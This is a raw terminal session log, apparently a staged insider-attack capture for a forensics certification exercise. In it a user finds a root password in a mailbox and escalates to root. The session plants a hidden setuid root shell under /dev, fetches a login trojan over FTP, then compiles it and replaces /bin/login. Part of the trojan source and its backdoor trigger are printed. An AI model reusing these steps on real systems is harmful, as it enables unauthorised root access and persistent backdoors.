Ryan Barnett - GCFA - Insider Test

Script started on Mon Jun 24 18:36:51 2002
[jdoe@saphe4 jdoe]$ id
uid=501(jdoe) gid=501(jdoe) groups=501(jdoe)
[jdoe@saphe4 jdoe]$ who
root     tty1     Jun 24 18:17
jdoe     pts/0    Jun 24 18:36
[jdoe@saphe4 jdoe]$ last -5
jdoe     pts/0        10.247.233.60    Mon Jun 24 18:36   still logged in
jdoe     pts/0        10.247.233.51    Mon Jun 24 18:32 - 18:32 (00:00)
jdoe     pts/0        10.247.233.51    Mon Jun 24 18:30 - 18:30 (00:00)
jdoe     pts/0        10.247.233.51    Mon Jun 24 18:28 - 18:28 (00:00)
jdoe     pts/0        10.247.233.51    Mon Jun 24 18:25 - 18:27 (00:01)

wtmp begins Sat Jun 15 09:32:20 2002
[jdoe@saphe4 jdoe]$ echo $SHELL
/bin/bash
[jdoe@saphe4 jdoe]$ ls -la
total 24
drwx------    2 jdoe     jdoe         4096 Jun 24 18:34 .
drwxr-xr-x    7 root     root         4096 Jun 24 06:48 ..
-rw-------    1 jdoe     jdoe            0 Jun 24 18:34 .bash_history
-rw-r--r--    1 jdoe     jdoe           24 Jun 24 06:48 .bash_logout
-rw-r--r--    1 jdoe     jdoe          259 Jun 24 17:46 .bash_profile
-rw-r--r--    1 jdoe     jdoe          124 Jun 24 06:48 .bashrc
-rw-r--r--    1 jdoe     jdoe         3394 Jun 24 06:48 .screenrc
[jdoe@saphe4 jdoe]$ /bin/csh
[jdoe@saphe4 ~]$ ls -la[6D[Kcat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
rbarnett:x:500:500::/home/rbarnett:/bin/bash
jdoe:x:501:501:Test Account:/home/jdoe:/bin/bash
[jdoe@saphe4 ~]$ cat /etc/shadow
cat: /etc/shadow: Permission denied
[jdoe@saphe4 ~]$ ./[K[K/[Kcat /etc/group
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root
lp:x:7:daemon,lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:
games:x:20:
gopher:x:30:
dip:x:40:
ftp:x:50:
nobody:x:99:
users:x:100:
floppy:x:19:
xfs:x:43:
console:x:31:
utmp:x:22:
pppusers:x:44:
popusers:x:45:
slipusers:x:46:
slocate:x:21:
rbarnett:x:500:
jdoe:x:501:
[jdoe@saphe4 ~]$ ps -ef
UID        PID PPID C STIME TTY          TIME CMD
root         1     0 0 06:51 ?        00:00:06 init [3]
root         2     1 0 06:51 ?        00:00:00 [kflushd]
root         3     1 0 06:51 ?        00:00:00 [kupdate]
root         4     1 0 06:51 ?        00:00:00 [kpiod]
root         5     1 0 06:51 ?        00:00:05 [kswapd]
root         6     1 0 06:52 ?        00:00:00 [mdrecoveryd]
bin        323     1 0 06:52 ?        00:00:00 [portmap]
root       338     1 0 06:53 ?        00:00:00 [lockd]
root       339   338 0 06:53 ?        00:00:00 [rpciod]
root       348     1 0 06:53 ?        00:00:00 [rpc.statd]
root       362     1 0 06:53 ?        00:00:00 [apmd]
root       413     1 0 06:53 ?        00:00:00 syslogd -m 0
root       422     1 0 06:53 ?        00:00:00 klogd
nobody     436     1 0 06:53 ?        00:00:00 [identd]
nobody     438   436 0 06:53 ?        00:00:00 [identd]
nobody     439   438 0 06:53 ?        00:00:00 [identd]
nobody     441   438 0 06:53 ?        00:00:00 [identd]
nobody     443   438 0 06:53 ?        00:00:00 [identd]
daemon     454     1 0 06:53 ?        00:00:00 /usr/sbin/atd
root       468     1 0 06:53 ?        00:00:00 crond
root       486     1 0 06:53 ?        00:00:00 inetd
root       500     1 0 06:53 ?        00:00:00 [lpd]
root       544     1 0 06:53 ?        00:00:00 sendmail: accepting connections on port 25
root       559     1 0 06:53 ?        00:00:00 gpm -t ps/2
xfs        593     1 0 06:53 ?        00:00:00 xfs -droppriv -daemon -port -1
root       632     1 0 06:53 tty2     00:00:00 [mingetty]
root       633     1 0 06:53 tty3     00:00:00 [mingetty]
root       634     1 0 06:53 tty4     00:00:00 [mingetty]
root       635     1 0 06:53 tty5     00:00:00 [mingetty]
root       636     1 0 06:53 tty6     00:00:00 [mingetty]
root      8686     1 0 18:17 tty1     00:00:00 login -- root
root      8687 8686 0 18:17 tty1     00:00:00 -bash
root      9043   486 0 18:36 ?        00:00:00 in.telnetd: 10.247.233.60
root      9044 9043 0 18:36 pts/0    00:00:00 login -- jdoe
jdoe      9045 9044 0 18:36 pts/0    00:00:00 -bash
jdoe      9065 9045 0 18:36 pts/0    00:00:00 bash /usr/bin/bash_check.sh
jdoe      9066 9065 0 18:36 pts/0    00:00:00 /usr/bin/bash_check
jdoe      9067 9066 0 18:36 pts/0    00:00:00 /usr/bin/bash_check
jdoe      9068 9067 0 18:36 pts/1    00:00:00 bash -i
jdoe      9081 9068 0 18:37 pts/1    00:00:00 -bin/csh
jdoe      9086 9081 0 18:38 pts/1    00:00:00 ps -ef
[jdoe@saphe4 ~]$ pwd
/home/jdoe
[jdoe@saphe4 ~]$ find / -type f -mtime -1 | xargs grep ro[K-i root | grep -i passwd > test
find: /home/ftp/bin: Permission denied
find: /home/ftp/etc: Permission denied
find: /home/rbarnett: Permission denied
find: /var/lib/nfs/sm: Permission denied
find: /var/lib/nfs/sm.bak: Permission denied
find: /var/lib/slocate: Permission denied
find: /var/log/samba: Permission denied
find: /var/spool/at: Permission denied
find: /var/spool/cron: Permission denied
find: /proc/1/fd: Permission denied
find: /proc/2/fd: Permission denied
find: /proc/3/fd: Permission denied
find: /proc/4/fd: Permission denied
find: /proc/5/fd: Permission denied
find: /proc/6/fd: Permission denied
find: /proc/323/fd: Permission denied
find: /proc/338/fd: Permission denied
find: /proc/339/fd: Permission denied
find: /proc/348/fd: Permission denied
find: /proc/362/fd: Permission denied
find: /proc/413/fd: Permission denied
find: /proc/422/fd: Permission denied
find: /proc/436/fd: Permission denied
find: /proc/438/fd: Permission denied
find: /proc/439/fd: Permission denied
find: /proc/441/fd: Permission denied
find: /proc/443/fd: Permission denied
find: /proc/454/fd: Permission denied
find: /proc/468/fd: Permission denied
find: /proc/486/fd: Permission denied
find: /proc/500/fd: Permission denied
find: /proc/544/fd: Permission denied
find: /proc/559/fd: Permission denied
find: /proc/593/fd: Permission denied
find: /proc/632/fd: Permission denied
find: /proc/633/fd: Permission denied
find: /proc/634/fd: Permission denied
find: /proc/635/fd: Permission denied
find: /proc/636/fd: Permission denied
find: /proc/8686/fd: Permission denied
find: /proc/8687/fd: Permission denied
find: /proc/9043/fd: Permission denied
find: /proc/9044/fd: Permission denied
find: /proc/9088/fd/4: No such file or directory
find: /etc/default: Permission denied
find: /root: Permission denied
grep: /var/lib/nfs/state: Permission denied
grep: /var/log/messages: Permission denied
grep: /var/log/secure: Permission denied
grep: /var/log/maillog: Permission denied
grep: /var/log/xferlog: Permission denied
grep: /var/log/cron: Permission denied
grep: /var/run/random-seed: Permission denied
grep: /var/spool/mail/root: Permission denied
grep: /var/spool/mqueue/qfMAA04625: Permission denied
grep: /var/spool/mqueue/dfMAA04625: Permission denied
grep: /proc/ide/ide1/hdc/settings: Permission denied
grep: /proc/ide/ide1/hdc/identify: Permission denied
grep: /proc/kcore: Permission denied
grep: /proc/sys/net/ipv4/route/flush: Invalid argument
grep: /proc/sys/net/unix/max_dgram_qlen: Permission denied
grep: /proc/sys/vm/page-cluster: Permission denied
grep: /proc/sys/vm/pagetable_cache: Permission denied
grep: /proc/sys/vm/bdflush: Permission denied
grep: /proc/sys/kernel/cap-bound: Permission denied
grep: /proc/net/ip_fwnames: Permission denied
grep: /proc/net/ip_fwchains: Permission denied
grep: /proc/kmsg: Permission denied
grep: /proc/1/environ: Permission denied
grep: /proc/1/mem: Permission denied
grep: /proc/2/environ: Permission denied
grep: /proc/2/mem: Permission denied
grep: /proc/3/environ: Permission denied
grep: /proc/3/mem: Permission denied
grep: /proc/4/environ: Permission denied
grep: /proc/4/mem: Permission denied
grep: /proc/5/environ: Permission denied
grep: /proc/5/mem: Permission denied
grep: /proc/6/environ: Permission denied
grep: /proc/6/mem: Permission denied
grep: /proc/323/environ: Permission denied
grep: /proc/323/mem: Permission denied
grep: /proc/338/environ: Permission denied
grep: /proc/338/mem: Permission denied
grep: /proc/339/environ: Permission denied
grep: /proc/339/mem: Permission denied
grep: /proc/348/environ: Permission denied
grep: /proc/348/mem: Permission denied
grep: /proc/362/environ: Permission denied
grep: /proc/362/mem: Permission denied
grep: /proc/413/environ: Permission denied
grep: /proc/413/mem: Permission denied
grep: /proc/422/environ: Permission denied
grep: /proc/422/mem: Permission denied
grep: /proc/436/environ: Permission denied
grep: /proc/436/mem: Permission denied
grep: /proc/438/environ: Permission denied
grep: /proc/438/mem: Permission denied
grep: /proc/439/environ: Permission denied
grep: /proc/439/mem: Permission denied
grep: /proc/441/environ: Permission denied
grep: /proc/441/mem: Permission denied
grep: /proc/443/environ: Permission denied
grep: /proc/443/mem: Permission denied
grep: /proc/454/environ: Permission denied
grep: /proc/454/mem: Permission denied
grep: /proc/468/environ: Permission denied
grep: /proc/468/mem: Permission denied
grep: /proc/486/environ: Permission denied
grep: /proc/486/mem: Permission denied
grep: /proc/500/environ: Permission denied
grep: /proc/500/mem: Permission denied
grep: /proc/544/environ: Permission denied
grep: /proc/544/mem: Permission denied
grep: /proc/559/environ: Permission denied
grep: /proc/559/mem: Permission denied
grep: /proc/593/environ: Permission denied
grep: /proc/593/mem: Permission denied
grep: /proc/632/environ: Permission denied
grep: /proc/632/mem: Permission denied
grep: /proc/633/environ: Permission denied
grep: /proc/633/mem: Permission denied
grep: /proc/634/environ: Permission denied
grep: /proc/634/mem: Permission denied
grep: /proc/635/environ: Permission denied
grep: /proc/635/mem: Permission denied
grep: /proc/636/environ: Permission denied
grep: /proc/636/mem: Permission denied
grep: /proc/8686/environ: Permission denied
grep: /proc/8686/mem: Permission denied
grep: /proc/8687/environ: Permission denied
grep: /proc/8687/mem: Permission denied
grep: /proc/9043/environ: Permission denied
grep: /proc/9043/mem: Permission denied
grep: /proc/9044/environ: Permission denied
grep: /proc/9044/mem: Permission denied
grep: /proc/9045/mem: No such process
grep: /proc/9065/mem: No such process
grep: /proc/9066/mem: No such process
grep: /proc/9067/mem: No such process
grep: /proc/9068/mem: No such process
grep: /proc/9081/mem: No such process
grep: /proc/9088/statm: No such file or directory
grep: /proc/9088/stat: No such file or directory
grep: /proc/9088/cmdline: No such file or directory
grep: /proc/9088/environ: No such file or directory
grep: /proc/9088/mem: No such file or directory
grep: /proc/9088/status: No such file or directory
grep: /etc/group-: Permission denied
grep: /etc/shadow-: Permission denied
grep: /etc/gshadow-: Permission denied
grep: /etc/shadow: Permission denied
grep: /etc/gshadow: Permission denied
grep: /etc/ioctl.save: Permission denied
[jdoe@saphe4 ~]$ ls -l
total 4
-rw-rw-r--    1 jdoe     jdoe          348 Jun 24 18:38 test
[jdoe@saphe4 ~]$ cat test
/var/spool/mail/rbarnett:Here is the new root passwd - <C3_P0>
/etc/passwd:root:x:0:0:root:/root:/bin/bash
/etc/passwd:operator:x:11:0:operator:/root:
/etc/passwd-:root:x:0:0:root:/root:/bin/bash
/etc/passwd-:operator:x:11:0:operator:/root:
[jdoe@saphe4 ~]$ su root
Password:
su: incorrect password
[jdoe@saphe4 ~]$ su root
Password:
su: incorrect password
[jdoe@saphe4 ~]$ su root
Password:
[root@saphe4 jdoe]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@saphe4 jdoe]# pwd
/home/jdoe
[root@saphe4 jdoe]# who
root     tty1     Jun 24 18:17
jdoe     pts/0    Jun 24 18:36
[root@saphe4 jdoe]# mkdir /dev/".. "
[root@saphe4 jdoe]# cd /dev/".. "
[root@saphe4 .. ]# cp /bin/sh .
[root@saphe4 .. ]# ls -l
[00mtotal 313
-rwxr-xr-x    1 root     root       316848 Jun 24 18:40 [01;32msh[00m
[m[root@saphe4 .. ]# chmod 4555 sh
[root@saphe4 .. ]# mv sh test
[root@saphe4 .. ]# ls -l
[00mtotal 313
-r-sr-xr-x    1 root     root       316848 Jun 24 18:40 [01;32mtest[00m
[m[root@saphe4 .. ]# ftp 10.XXX.XXX.60
Connected to 10.XXX.XXX.60.
220 saphe2 FTP server (This system is for authorized users only. All transfers are logged.) ready.
Name (10.247.233.60:root): jdoe
331 Password required for jdoe.
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> user jdoe
331 Password required for jdoe.
Password:
230 User jdoe logged in.
ftp> bin
200 Type set to I.
ftp> hash
Hash mark printing on (1024 bytes/hash mark).
ftp> get bingo.c
local: bingo.c remote: bingo.c
200 PORT command successful.
150 Binary data connection for bingo.c (10.XXX.XXX.53,1041) (1346 bytes).
#
226 Binary Transfer complete.
1346 bytes received in 0.0032 secs (4.1e+02 Kbytes/sec)
ftp> bye
221 Goodbye.
[root@saphe4 .. ]# ls
[00m[01;32mtest[00m [00mbingo.c[00m
[m[root@saphe4 .. ]# vu i bingo.c
[?1h=[1;30r[H[J[30;1H"bingo.c" 51L, 1346C[1;1H/*
* PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
*      Universal login trojan by Tragedy/Dor
*[14CEmail: rawpower@iname.com
*[14CIRC: [Dor]@ircnet
*
*      Login trojan for pretty much any O/S...
*      Tested on:   Linux, BSDI 2.0, FreeBSD, IRIX 6.x, 5.x, Sunos 5.5,5.6,5.7
*[19COSF1/DGUX4.0,
*      Known not to work on:
*[14CSunOS 4.x and 5.4... Seems the only variable passwd to login
*[14Con these versions of SunOS is the $TERM... and its passed via
*[14Ccommandline option... should be easy to work round in time
*
*   #define[9CPASSWORD - Set your password here
*   #define[9C_PATH_LOGIN - This is where you moved the original login to
* login to hacked host with...
* from bourne shell (sh, bash) sh DISPLAY="your pass";export DISPLAY;telnet host
*
*/

#include[8C<stdio.h>
#if !defined(PASSWORD)
#define[9CPASSWORD[8C"j4l0n3n"
#endif
#if !defined(_PATH_LOGIN)
# define[16C_PATH_LOGIN "/bin/login"
#endif[1;1H

#define[8C PASSWOR[8C "j4l4l0n3n"[24;41H[K[24;34Hl0n3n"[24;40H[K[24;34H0n3n"[24;39H[K[24;34Hn3n"[24;38H[K[24;34H3n"[24;37H[K[24;34Hn"[24;36H[K[24;34H"[24;35H[K[24;34H[30;1H[1m-- INSERT --[m[30;13H[K[24;34Ht"o"o"r"[30;1H[K[24;37H[25;6H[26;25H[27;37H "/in/login"[27;52H[K[27;43Hn/login"[27;51H[K[27;43H/login"[27;50H[K[27;43H

[1m-- INSERT --[27;43H[md/login"[27;44He/login"[27;45Hv/login"[27;46H//login"[27;47H./login"[27;48H./login"[27;49H /login"[27;50H[30;1H[K[27;49H

:wq!
"bingo.c" 51L, 1347C written
[?1l>
[root@saphe4 .. ]# gcc -o login.new bingo.c
ulogin.c: In function `main':
ulogin.c:35: warning: initialization makes pointer from integer without a cast
[root@saphe4 .. ]# ls -l
[00mtotal 329
-rwxrwxr-x    1 root     root        12344 Jun 24 18:41 [01;32mlogin.new[00m
-r-sr-xr-x    1 root     root       316848 Jun 24 18:40 [01;32mtest[00m
-rw-rw-r--    1 root     root         1347 Jun 24 18:41 [00mbingo.c[00m
[m[root@saphe4 .. ]# mv /bin/login .
[root@saphe4 .. ]# cp logion n.new /bin/login
[root@saphe4 .. ]# ls -l
[00mtotal 350
-rwxr-xr-x    1 root     root        20452 Mar 7 2000 [01;32mlogin[00m
-rwxrwxr-x    1 root     root        12344 Jun 24 18:41 [01;32mlogin.new[00m
-r-sr-xr-x    1 root     root       316848 Jun 24 18:40 [01;32mtest[00m
-rw-rw-r--    1 root     root         1347 Jun 24 18:41 [00mbingo.c[00m
[m[root@saphe4 .. ]# exit
exit
[jdoe@saphe4 ~]$ id
uid=501(jdoe) gid=501(jdoe) groups=501(jdoe)
[jdoe@saphe4 ~]$ /dev/..[K[K".. "/test
[jdoe@saphe4 jdoe]# id
uid=501(jdoe) gid=501(jdoe) euid=0(root) groups=501(jdoe)
[jdoe@saphe4 jdoe]# exit
exit
[jdoe@saphe4 ~]$ id
uid=501(jdoe) gid=501(jdoe) groups=501(jdoe)
[jdoe@saphe4 ~]$ echo $DISPLAY
saphe2:10.0
[jdoe@saphe4 ~]$ DISPLAY=toor
DISPLAY=toor: Command not found.
[jdoe@saphe4 ~]$ echo $SHELL
/bin/bash
[jdoe@saphe4 ~]$ exit
exit
[jdoe@saphe4 jdoe]$ DISPLAY=toor ls -la
[00mtotal 32
drwx------    2 jdoe     jdoe         4096 Jun 24 18:38 [01;34m.[00m
drwxr-xr-x    7 root     root         4096 Jun 24 06:48 [01;34m..[00m
-rw-------    1 jdoe     jdoe           8 Jun 24 18:42 [00m.bash_history[00m
-rw-r--r--    1 jdoe     jdoe           24 Jun 24 06:48 [00m.bash_logout[00m
-rw-r--r--    1 jdoe     jdoe          259 Jun 24 17:46 [00m.bash_profile[00m
-rw-r--r--    1 jdoe     jdoe          124 Jun 24 06:48 [00m.bashrc[00m
-rw-r--r--    1 jdoe     jdoe         3394 Jun 24 06:48 [00m.screenrc[00m
-rw-rw-r--    1 jdoe     jdoe          348 Jun 24 18:38 [00mtest[00m
[m[jdoe@saphe4 jdoe]$ history
    1 id
    2 who
    3 last -5
    4 echo $SHELL
    5 /bin/csh
    6 ls -la
    7 history
[jdoe@saphe4 jdoe]$ exit
exit

Script done on Mon Jun 24 18:43:48 2002
MD5 (/tmp/.Xconfig.old) = 8380d80f727c35fcded5a3ec66876b1b
sent 0, rcvd 18092